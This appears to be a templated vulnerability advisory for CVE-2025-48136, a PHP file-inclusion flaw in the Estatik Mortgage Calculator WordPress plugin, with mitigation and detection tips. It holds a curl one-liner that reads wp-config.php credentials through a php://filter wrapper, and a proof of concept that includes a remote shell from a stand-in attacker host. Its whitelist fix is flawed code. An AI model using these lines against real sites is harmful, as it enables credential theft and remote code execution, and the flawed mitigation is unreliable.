Listen to this Post
How the CVE Works:
CVE-2025-48136 is a PHP Local File Inclusion (LFI) vulnerability in Estatik Mortgage Calculator (versions ≤ 2.0.12). The flaw arises from improper sanitization of user-supplied input in file inclusion functions (include, require). Attackers can manipulate dynamic file paths to load malicious PHP files from remote servers (RFI) or local directories (LFI), leading to arbitrary code execution. For example, a crafted request like `https://target.com/wp-content/plugins/estatik/?file=../../../wp-config.php` could expose sensitive configuration files.
DailyCVE Form:
Platform: WordPress Plugin
Version: ≤ 2.0.12
Vulnerability: PHP LFI/RFI
Severity: Critical
Date: 05/30/2025
Prediction: Patch by 06/15/2025
What Undercode Say:
Exploit:
curl -s "http://target.com/wp-content/plugins/estatik/?file=php://filter/convert.base64-encode/resource=wp-config.php" | base64 -d
PoC (PHP RFI):
<?php $url = "http://attacker.com/shell.txt"; include($url); // Executes remote PHP ?>
Mitigation:
1. Restrict file inclusion to whitelisted directories:
$allowed = ['/safe/path/'];
if (!in_array($file, $allowed)) { die('Access denied'); }
2. Use `.htaccess` to block remote includes:
php_flag allow_url_include Off
3. Update to Estatik v2.0.13+ (post-patch).
Detection (Linux):
grep -r "include\s(.\$_GET" /var/www/html/
Impact Analysis:
- CVSS:4.0 AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
- Exploitability: Low complexity, no auth required.
Patch Verification:
diff -u vulnerable.php patched.php | grep "sanitize_file_path"
References:
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
